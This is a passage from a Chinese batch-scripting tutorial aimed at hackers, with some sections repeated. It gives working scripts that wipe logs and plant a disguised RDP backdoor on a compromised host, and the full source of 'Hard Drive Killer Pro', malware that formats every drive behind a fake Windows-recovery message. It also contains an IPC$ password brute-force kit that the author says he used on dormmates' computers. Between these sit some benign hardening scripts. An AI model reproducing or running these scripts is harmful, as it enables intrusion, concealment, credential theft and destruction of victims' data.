学习使用批处理文件的意义第2/2页

------------------------ cut here then save as .bat or .cmd file --------------------------- 
　　下面命令是清除肉鸡所有日志，禁止一些危险的服务，并修改肉鸡的terminnal service留跳后路。 
　　@regedit /s patch.dll 
　　@net stop w3svc 
　　@net stop event log 
　　@del c:\winnt\system32\logfiles\w3svc1\*.* /f /q 
　　@del c:\winnt\system32\logfiles\w3svc2\*.* /f /q 
　　@del c:\winnt\system32\config\*.event /f /q 
　　@del c:\winnt\system32dtclog\*.* /f /q 
　　@del c:\winnt\*.txt /f /q 
　　@del c:\winnt\*.log /f /q 
　　@net start w3svc 
　　@net start event log 
　　@rem [删除日志] 
　　@net stop lanmanserver /y 
　　@net stop Schedule /y 
　　@net stop RemoteRegistry /y 
　　@del patch.dll 
　　@echo The server has been patched,Have fun. 
　　@del patch.bat 
　　@REM [禁止一些危险的服务。] 
　　@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>patch.dll 
　　@echo "PortNumber"=dword:00002010 >>patch.dll 
　　@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp >>patch.dll 
　　@echo "PortNumber"=dword:00002012 >>patch.dll 
　　@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>patch.dll 
　　@echo "Start"=dword:00000002 >>patch.dll 
　　@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService] >>patch.dll 
　　@echo "Start"=dword:00000002 >>patch.dll 
　　@echo "ErrorControl"=dword:00000001 >>patch.dll 
　　@echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\ >>patch.dll 
　　@echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\ >>patch.dll 
　　@echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 >>patch.dll 
　　@echo "ObjectName"="LocalSystem" >>patch.dll 
　　@echo "Type"=dword:00000010 >>patch.dll 
　　@echo "Description"="Keep record of the program and windows message。" >>patch.dll 
　　@echo "DisplayName"="Microsoft EventLog" >>patch.dll 
　　@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice] >>patch.dll 
　　@echo "Start"=dword:00000004 >>patch.dll 
　　@copy c:\winnt\system32\termsrv.exe c:\winnt\system32\eventlog.exe 
　　@REM [修改3389连接，端口为8210(十六进制为00002012)，名称为Microsoft EventLog，留条后路] 
3.Hard Drive Killer Pro Version 4.0（玩批处理到这个水平真的不容易了。） 
　　------------------------ cut here then save as .bat or .cmd file --------------------------- 
　　@echo off 
　　rem This program is dedecated to a very special person that does not want to be named. 
　　:start 
　　cls 
　　echo PLEASE WAIT WHILE PROGRAM LOADS . . . 
　　call attrib -r -h c:\autoexec.bat >nul 
　　echo @echo off >c:\autoexec.bat 
　　echo call format c: /q /u /autoSample >nul >>c:\autoexec.bat 
　　call attrib +r +h c:\autoexec.bat >nul 
　　rem Drive checking and assigning the valid drives to the drive variable. 
　　set drive= 
　　set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z 
　　rem code insertion for Drive Checking takes place here. 
　　rem drivechk.bat is the file name under the root directory. 
　　rem As far as the drive detection and drive variable settings, dont worry about how it 
　　rem works, its d\*amn to complicated for the average or even the expert batch programmer. 
　　rem Except for Tom Lavedas. 
　　echo @echo off >drivechk.bat 
　　echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" > nul >{t}.bat 
　　%comspec% /e:2048 /c {t}.bat >>drivechk.bat 
　　del {t}.bat 
　　echo if errorlevel 1 goto enddc >>drivechk.bat 
　　cls 
　　echo PLEASE WAIT WHILE PROGRAM LOADS . . . 
　　rem When errorlevel is 1, then the above is not true, if 0, then its true. 
　　rem Opposite of binary rules. If 0, it will elaps to the next command. 
　　echo @prompt %%%%comspec%%%% /f /c dir %%%%1:.\/ad/w/-p $b find "bytes" > nul >{t}.bat 
　　%comspec% /e:2048 /c {t}.bat >>drivechk.bat 
　　del {t}.bat 
　　echo if errorlevel 1 goto enddc >>drivechk.bat 
　　cls 
　　echo PLEASE WAIT WHILE PROGRAM LOADS . . . 
　　rem if errorlevel is 1, then the drive specified is a removable media drive - not ready. 
　　rem if errorlevel is 0, then it will elaps to the next command. 
　　echo @prompt dir %%%%1:.\/ad/w/-p $b find " 0 bytes free" > nul >{t}.bat 
　　%comspec% /e:2048 /c {t}.bat >>drivechk.bat 
　　del {t}.bat 
　　echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat 
　　cls 
　　echo PLEASE WAIT WHILE PROGRAM LOADS . . . 
　　rem if its errorlevel 1, then the specified drive is a hard or floppy drive. 
　　rem if its not errorlevel 1, then the specified drive is a CD-ROM drive. 
echo :enddc >>drivechk.bat 
　　rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING". 
　　rem Now we will use the program drivechk.bat to attain valid drive information. 
　　:Sampledrv 
　　for %%a in (%alldrive%) do call drivechk.bat %%a >nul 
　　del drivechk.bat >nul 
　　if %drive.==. set drive=c 
　　:form_del 
　　call attrib -r -h c:\autoexec.bat >nul 
　　echo @echo off >c:\autoexec.bat 
　　echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat 
　　echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c:\autoexec.bat 
　　echo cls >>c:\autoexec.bat 
　　echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat 
　　echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat 
　　echo cls >>c:\autoexec.bat 
　　echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat 
　　echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat 
　　echo cls >>c:\autoexec.bat 
　　echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat 
　　echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c:\autoexec.bat 
　　echo cls >>c:\autoexec.bat 
　　echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat 
　　echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat 
　　echo cls >>c:\autoexec.bat 
　　echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat 
　　echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat 
　　echo cd\ >>c:\autoexec.bat 
　　echo cls >>c:\autoexec.bat 
　　echo echo Welcome to the land of death. Munga Bungas Multiple Hard Drive Killer version 4.0. >>c:\autoexec.bat 
　　echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following. . . >>c:\autoexec.bat 
　　echo echo 1. To make people aware that security should not be taken for granted. >>c:\autoexec.bat 
　　echo echo 2. Love is important, if you have it, truly, dont let go of it like I did! >>c:\autoexec.bat 
　　echo echo 3. If you are NOT a vegetarian, then you are a murderer, and Im glad your HD is dead. >>c:\autoexec.bat 
　　echo echo 4. Dont support the following: War, Racism, Drugs and the Liberal Party.>>c:\autoexec.bat 
　　echo echo. >>c:\autoexec.bat 
　　echo echo Regards, >>c:\autoexec.bat 
　　echo echo. >>c:\autoexec.bat 
　　echo echo Munga Bunga >>c:\autoexec.bat 
　　call attrib +r +h c:\autoexec.bat 
　　:makedir 
　　if exist c:\temp.bat attrib -r -h c:\temp.bat >nul 
　　echo @echo off >c:\temp.bat 
　　echo %%1:\ >>c:\temp.bat 
　　echo cd\ >>c:\temp.bat 
　　echo :startmd >>c:\temp.bat 
　　echo for %%%%a in ("if not exist %%2\nul md %%2" "if exist %%2\nul cd %%2") do %%%%a >>c:\temp.bat 
　　echo for %%%%a in (">ass_hole.txt") do echo %%%%a Your Gone @$$hole!!!! >>c:\temp.bat 
　　echo if not exist %%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\nul goto startmd >>c:\temp.bat 
　　call attrib +r +h c:\temp.bat >nul 
　　cls 
　　echo Initializing Variables . . . 
　　rem deltree /y %%a:\*. only eliminates directories, hence leaving the file created above for further destruction. 
　　for %%a in (%drive%) do call format %%a: /q /u /autoSample >nul 
　　cls 
　　echo Initializing Variables . . . 
　　echo Validating Data . . . 
　　for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul 
　　cls 
　　echo Initializing Variables . . . 
　　echo Validating Data . . . 
　　echo Analyzing System Structure . . . 
　　for %%a in (%drive%) call attrib -r -h %%a:\ /S >nul 
　　call attrib +r +h c:\temp.bat >nul 
　　call attrib +r +h c:\autoexec.bat >nul 
　　cls 
　　echo Initializing Variables . . . 
　　echo Validating Data . . . 
　　echo Analyzing System Structure . . . 
　　echo Initializing Application . . . 
　　for %%a in (%drive%) call deltree /y %%a:\*. >nul 
　　cls 
　　echo Initializing Variables . . . 
　　echo Validating Data . . . 
　　echo Analyzing System Structure . . . 
　　echo Initializing Application . . . 
　　echo Starting Application . . . 
　　for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul 
　　cls 
　　echo Thank you for using a Munga Bunga product. 
　　echo. 
　　echo Oh and, Bill Gates rules, and he is not a geek, he is a good looking genius. 
　　echo. 
　　echo Here is a joke for you . . . 
　　echo. 
　　echo Q). Whats the worst thing about being an egg? 
　　echo A). You only get laid once. 
　　echo. 
　　echo HAHAHAHA, get it? Dont you just love that one? 
　　echo. 
　　echo Regards, 
　　echo. 
　　echo Munga Bunga 
　　:end 
　　rem Hard Drive Killer Pro Version 4.0, enjoy!!!! 
　　rem Author: Munga Bunga - from Australia, the land full of retarded Australians (help me get out of here). 
六.精彩实例放送。 
　　1.删除win2k/xp系统默认共享的批处理 
　　------------------------ cut here then save as .bat or .cmd file --------------------------- 
　　@echo preparing to delete all the default shares.when ready pres any key. 
　　@pause 
　　@echo off 
　　:Rem check parameters if null show usage. 
　　if {%1}=={} goto :Usage 
　　:Rem code start. 
　　echo. 
　　echo ------------------------------------------------------ 
　　echo. 
　　echo Now deleting all the default shares. 
　　echo. 
　　net share %1$ /delete 
　　net share %2$ /delete 
　　net share %3$ /delete 
　　net share %4$ /delete 
　　net share %5$ /delete 
　　net share %6$ /delete 
　　net share %7$ /delete 
　　net share %8$ /delete 
　　net share %9$ /delete 
　　net stop Server 
　　net start Server 
　　echo. 
　　echo All the shares have been deleteed 
　　echo. 
　　echo ------------------------------------------------------ 
　　echo. 
　　echo Now modify the registry to change the system default properties. 
　　echo. 
　　echo Now creating the registry file 
　　echo Windows Registry Editor Version 5.00> c:\delshare.reg 
　　echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>> c:\delshare.reg 
　　echo "AutoShareWks"=dword:00000000>> c:\delshare.reg 
　　echo "AutoShareServer"=dword:00000000>> c:\delshare.reg 
　　echo Nowing using the registry file to chang the system default properties. 
　　regedit /s c:\delshare.reg 
　　echo Deleting the temprotarily files. 
　　del c:\delshare.reg 
　　goto :END 
　　:Usage 
　　echo. 
　　echo ------------------------------------------------------ 
　　echo. 
　　echo ☆ A example for batch file ☆ 
　　echo ☆ [Use batch file to change the sysytem share properties.] ☆ 
　　echo. 
　　echo Author：Ex4rch 
　　echo Mail:Ex4rch@hotmail.com QQ:1672602 
　　echo. 
　　echo Error：Not enough parameters 
　　echo. 
　　echo ☆ Please enter the share disk you wanna delete ☆ 
　　echo. 
　　echo For instance，to delete the default shares: 
　　echo delshare c d e ipc admin print 
　　echo. 
　　echo If the disklable is not as C: D: E: ，Please chang it youself. 
　　echo. 
　　echo example： 
　　echo If locak disklable are C: D: E: X: Y: Z: ，you should chang the command into ： 
　　echo delshare c d e x y z ipc admin print 
　　echo. 
　　echo *** you can delete nine shares once in a useing *** 
　　echo. 
　　echo ------------------------------------------------------ 
　　goto :EOF 
　　:END 
　　echo. 
　　echo ------------------------------------------------------ 
　　echo. 
　　echo OK,delshare.bat has deleted all the share you assigned. 
　　echo.Any questions ,feel free to mail to Ex4rch@hotmail.com. 
　　echo 
　　echo. 
　　echo ------------------------------------------------------ 
　　echo. 
　　:EOF 
　　echo end of the batch file 
　　------------------------ cut here then save as .bat or .cmd file --------------------------- 
2.全面加固系统（给肉鸡打补丁）的批处理文件 
　　------------------------ cut here then save as .bat or .cmd file --------------------------- 
　　@echo Windows Registry Editor Version 5.00 >patch.dll 
　　@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters] >>patch.dll 
　　@echo "AutoShareServer"=dword:00000000 >>patch.dll 
　　@echo "AutoShareWks"=dword:00000000 >>patch.dll 
　　@REM [禁止共享] 
　　@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >>patch.dll 
　　@echo "restrictanonymous"=dword:00000001 >>patch.dll 
　　@REM [禁止匿名登录] 
　　@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters] >>patch.dll 
　　@echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll 
　　@REM [禁止及文件访问和打印共享] 
　　@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\@REMoteRegistry] >>patch.dll 
　　@echo "Start"=dword:00000004 >>patch.dll 
　　@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule] >>patch.dll 
　　@echo "Start"=dword:00000004 >>patch.dll 
　　@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>patch.dll 
　　@echo "ShutdownWithoutLogon"="0" >>patch.dll 
　　@REM [禁止登录前关机] 
　　@echo "DontDisplayLastUserName"="1" >>patch.dll 
　　@REM [禁止显示前一个登录用户名称] 
　　@regedit /s patch.dll 
------------------------ cut here then save as .bat or .cmd file --------------------------- 
　　下面命令是清除肉鸡所有日志，禁止一些危险的服务，并修改肉鸡的terminnal service留跳后路。 
　　@regedit /s patch.dll 
　　@net stop w3svc 
　　@net stop event log 
　　@del c:\winnt\system32\logfiles\w3svc1\*.* /f /q 
　　@del c:\winnt\system32\logfiles\w3svc2\*.* /f /q 
　　@del c:\winnt\system32\config\*.event /f /q 
　　@del c:\winnt\system32dtclog\*.* /f /q 
　　@del c:\winnt\*.txt /f /q 
　　@del c:\winnt\*.log /f /q 
　　@net start w3svc 
　　@net start event log 
　　@rem [删除日志] 
　　@net stop lanmanserver /y 
　　@net stop Schedule /y 
　　@net stop RemoteRegistry /y 
　　@del patch.dll 
　　@echo The server has been patched,Have fun. 
　　@del patch.bat 
　　@REM [禁止一些危险的服务。] 
　　@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>patch.dll 
　　@echo "PortNumber"=dword:00002010 >>patch.dll 
　　@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp >>patch.dll 
　　@echo "PortNumber"=dword:00002012 >>patch.dll 
　　@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>patch.dll 
　　@echo "Start"=dword:00000002 >>patch.dll 
　　@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService] >>patch.dll 
　　@echo "Start"=dword:00000002 >>patch.dll 
　　@echo "ErrorControl"=dword:00000001 >>patch.dll 
　　@echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\ >>patch.dll 
　　@echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\ >>patch.dll 
　　@echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 >>patch.dll 
　　@echo "ObjectName"="LocalSystem" >>patch.dll 
　　@echo "Type"=dword:00000010 >>patch.dll 
　　@echo "Description"="Keep record of the program and windows message。" >>patch.dll 
　　@echo "DisplayName"="Microsoft EventLog" >>patch.dll 
　　@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice] >>patch.dll 
　　@echo "Start"=dword:00000004 >>patch.dll 
　　@copy c:\winnt\system32\termsrv.exe c:\winnt\system32\eventlog.exe 
　　@REM [修改3389连接，端口为8210(十六进制为00002012)，名称为Microsoft EventLog，留条后路] 
3.Hard Drive Killer Pro Version 4.0（玩批处理到这个水平真的不容易了。） 
　　------------------------ cut here then save as .bat or .cmd file --------------------------- 
　　@echo off 
　　rem This program is dedecated to a very special person that does not want to be named. 
　　:start 
　　cls 
　　echo PLEASE WAIT WHILE PROGRAM LOADS . . . 
　　call attrib -r -h c:\autoexec.bat >nul 
　　echo @echo off >c:\autoexec.bat 
　　echo call format c: /q /u /autoSample >nul >>c:\autoexec.bat 
　　call attrib +r +h c:\autoexec.bat >nul 
　　rem Drive checking and assigning the valid drives to the drive variable. 
　　set drive= 
　　set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z 
　　rem code insertion for Drive Checking takes place here. 
　　rem drivechk.bat is the file name under the root directory. 
　　rem As far as the drive detection and drive variable settings, dont worry about how it 
　　rem works, its d\*amn to complicated for the average or even the expert batch programmer. 
　　rem Except for Tom Lavedas. 
　　echo @echo off >drivechk.bat 
　　echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" > nul >{t}.bat 
　　%comspec% /e:2048 /c {t}.bat >>drivechk.bat 
　　del {t}.bat 
　　echo if errorlevel 1 goto enddc >>drivechk.bat 
　　cls 
　　echo PLEASE WAIT WHILE PROGRAM LOADS . . . 
　　rem When errorlevel is 1, then the above is not true, if 0, then its true. 
　　rem Opposite of binary rules. If 0, it will elaps to the next command. 
　　echo @prompt %%%%comspec%%%% /f /c dir %%%%1:.\/ad/w/-p $b find "bytes" > nul >{t}.bat 
　　%comspec% /e:2048 /c {t}.bat >>drivechk.bat 
　　del {t}.bat 
　　echo if errorlevel 1 goto enddc >>drivechk.bat 
　　cls 
　　echo PLEASE WAIT WHILE PROGRAM LOADS . . . 
　　rem if errorlevel is 1, then the drive specified is a removable media drive - not ready. 
　　rem if errorlevel is 0, then it will elaps to the next command. 
　　echo @prompt dir %%%%1:.\/ad/w/-p $b find " 0 bytes free" > nul >{t}.bat 
　　%comspec% /e:2048 /c {t}.bat >>drivechk.bat 
　　del {t}.bat 
　　echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat 
　　cls 
　　echo PLEASE WAIT WHILE PROGRAM LOADS . . . 
　　rem if its errorlevel 1, then the specified drive is a hard or floppy drive. 
　　rem if its not errorlevel 1, then the specified drive is a CD-ROM drive. 
　　echo :enddc >>drivechk.bat 
　　rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING". 
　　rem Now we will use the program drivechk.bat to attain valid drive information. 
　　:Sampledrv 
　　for %%a in (%alldrive%) do call drivechk.bat %%a >nul 
　　del drivechk.bat >nul 
　　if %drive.==. set drive=c 
　　:form_del 
　　call attrib -r -h c:\autoexec.bat >nul 
　　echo @echo off >c:\autoexec.bat 
　　echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat 
　　echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c:\autoexec.bat 
　　echo cls >>c:\autoexec.bat 
　　echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat 
　　echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat 
　　echo cls >>c:\autoexec.bat 
　　echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat 
　　echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat 
　　echo cls >>c:\autoexec.bat 
　　echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat 
　　echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c:\autoexec.bat 
　　echo cls >>c:\autoexec.bat 
　　echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat 
　　echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat 
　　echo cls >>c:\autoexec.bat 
　　echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat 
　　echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat 
　　echo cd\ >>c:\autoexec.bat 
　　echo cls >>c:\autoexec.bat 
　　echo echo Welcome to the land of death. Munga Bungas Multiple Hard Drive Killer version 4.0. >>c:\autoexec.bat 
　　echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following. . . >>c:\autoexec.bat 
　　echo echo 1. To make people aware that security should not be taken for granted. >>c:\autoexec.bat 
　　echo echo 2. Love is important, if you have it, truly, dont let go of it like I did! >>c:\autoexec.bat 
　　echo echo 3. If you are NOT a vegetarian, then you are a murderer, and Im glad your HD is dead. >>c:\autoexec.bat 
　　echo echo 4. Dont support the following: War, Racism, Drugs and the Liberal Party.>>c:\autoexec.bat 
　　echo echo. >>c:\autoexec.bat 
　　echo echo Regards, >>c:\autoexec.bat 
　　echo echo. >>c:\autoexec.bat 
　　echo echo Munga Bunga >>c:\autoexec.bat 
　　call attrib +r +h c:\autoexec.bat 
　　:makedir 
　　if exist c:\temp.bat attrib -r -h c:\temp.bat >nul 
　　echo @echo off >c:\temp.bat 
　　echo %%1:\ >>c:\temp.bat 
　　echo cd\ >>c:\temp.bat 
　　echo :startmd >>c:\temp.bat 
　　echo for %%%%a in ("if not exist %%2\nul md %%2" "if exist %%2\nul cd %%2") do %%%%a >>c:\temp.bat 
　　echo for %%%%a in (">ass_hole.txt") do echo %%%%a Your Gone @$$hole!!!! >>c:\temp.bat 
　　echo if not exist %%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\nul goto startmd >>c:\temp.bat 
　　call attrib +r +h c:\temp.bat >nul 
　　cls 
　　echo Initializing Variables . . . 
　　rem deltree /y %%a:\*. only eliminates directories, hence leaving the file created above for further destruction. 
　　for %%a in (%drive%) do call format %%a: /q /u /autoSample >nul 
　　cls 
　　echo Initializing Variables . . . 
　　echo Validating Data . . . 
　　for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul 
　　cls 
　　echo Initializing Variables . . . 
　　echo Validating Data . . . 
　　echo Analyzing System Structure . . . 
　　for %%a in (%drive%) call attrib -r -h %%a:\ /S >nul 
　　call attrib +r +h c:\temp.bat >nul 
　　call attrib +r +h c:\autoexec.bat >nul 
　　cls 
　　echo Initializing Variables . . . 
　　echo Validating Data . . . 
　　echo Analyzing System Structure . . . 
　　echo Initializing Application . . . 
　　for %%a in (%drive%) call deltree /y %%a:\*. >nul 
　　cls 
　　echo Initializing Variables . . . 
　　echo Validating Data . . . 
　　echo Analyzing System Structure . . . 
　　echo Initializing Application . . . 
　　echo Starting Application . . . 
　　for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul 
　　cls 
　　echo Thank you for using a Munga Bunga product. 
　　echo. 
　　echo Oh and, Bill Gates rules, and he is not a geek, he is a good looking genius. 
　　echo. 
　　echo Here is a joke for you . . . 
　　echo. 
　　echo Q). Whats the worst thing about being an egg? 
　　echo A). You only get laid once. 
　　echo. 
　　echo HAHAHAHA, get it? Dont you just love that one? 
　　echo. 
　　echo Regards, 
　　echo. 
　　echo Munga Bunga 
　　:end 
　　rem Hard Drive Killer Pro Version 4.0, enjoy!!!! 
　　rem Author: Munga Bunga - from Australia, the land full of retarded Australians (help me get out of here). 
　　No.7 
　　七、致谢&一些废话 
　　谨以此文献给所有为实现网络的自由与共享而努力的朋友们。感谢所有共享他们作品的朋友们，让我们为我们的理想一起努力！！ 
　　部分内容来自Ex4rchhttp://www.（很好的一个...淙幌缘糜械闼缮?/a>^_^）。再次特别感谢！ 
=========================================================================
假如知道一个NT帐户与密码，就可以用 
　　net use \\主机\ipc$ "密码" /user:"用户" 
　　与远程主机建立连接，这是每一个黑客或是梦想成为又或是正在努力成为黑客的朋友都知道的方法，甚至连我这个连菜鸟都算不上的小鸟都知道，我也仅仅知道这一条，我就用我仅仅知道的这一条在宿舍网里进入别人的电脑，因为他们的电脑密码都为空，被他们发现了之后狠K了一顿，然后纷纷加上了密码，这下可没戏了，想去偷窥他们的密码他们又防范得紧，只得想其他办法，也许各位大虾们就会利用其他方法，诸如寻找系统之类得到管理权限，而我不行，因为我前面说过，我只会那一条，那又会有人说用软件暴力破解密码就可以了，也许不错，但首先我没有那些高深的软件也没有天赋去研究那些复杂的用法，却在无意间看DOS帮助时发现了一些命令，当真是天无绝人之路： 
　　1、字典：for /f %i in (字典文件) do net use \\主机\ipc$ "%i" /user:"用户" 
　　2、数字：for /l %i in (start,step,end) do net use \\主机\ipc$ "%i" /user:"用户" 
　　以上可参看DOS里面for帮助，还别说，真让我给连上几台机子，可问题也随之而来，连是连上了，我仍然不知道密码，下次要用还得重新全部试过。 
　　正失望，无意间又发现了一个好方法，也许是我太笨，也许你们更聪明，，说不定你们早已经发现了，不再说废话，下面就将方法全部给出，请各位大虾指正： 
　　将下面文件存为pass.bat: 
　　@echo off 
　　echo ---------------------------------------- >>c:\pass.txt 
　　echo ---------------------------------------- >>c:\pass.txt 
　　date /t >>c:\pass.txt 
　　time /t >>c:\pass.txt 
　　echo 破解结果： >>c:\pass.txt 
　　if "%6"=="1" goto shit2 
　　:shit1 
　　start "正在破解" /min cmd /c for /f %%i in (%1) do call test.bat %2 "%%i" %3 
　　goto quit 
　　:shit2 
　　start "正在破解" /min cmd /c for /l %%i in (%1,%2,%3) do call test.bat %4 "%%i" %5 
　　:quit 
　　将下面文件存为test.bat: 
　　net use \\%1\ipc$ %2 /user:"%3" 
　　goto answer%ERRORLEVEL% 
　　rem %ERRORLEVEL%表示取前一命令执行返回结果，net use成功返回0，失败返回2 
　　:answer0 
　　echo 远程主机："%1" >>c:\pass.txt 
　　echo 用 户："%3" >>c:\pass.txt 
　　echo 密 码：%2 >>c:\pass.txt 
　　net use \\%1\ipc$ /delet 
　　exit 
　　:answer2 
　　将pass.bat与test.bat存放于system32中，用法如下： 
　　1、如果用字典破解：pass.bat 字典文件路径及名称 主机 用户名 
　　2、如果用数字破解：pass.bat 起始数 步长 结束数 主机 用户名 1 
　　密码破解出来之后，存放于c:\pass.txt文件里面。 
　　另外，我做的这些只是在局域网内测试，如果远程测试，受网速限制，具体情况只能靠自己去摸索。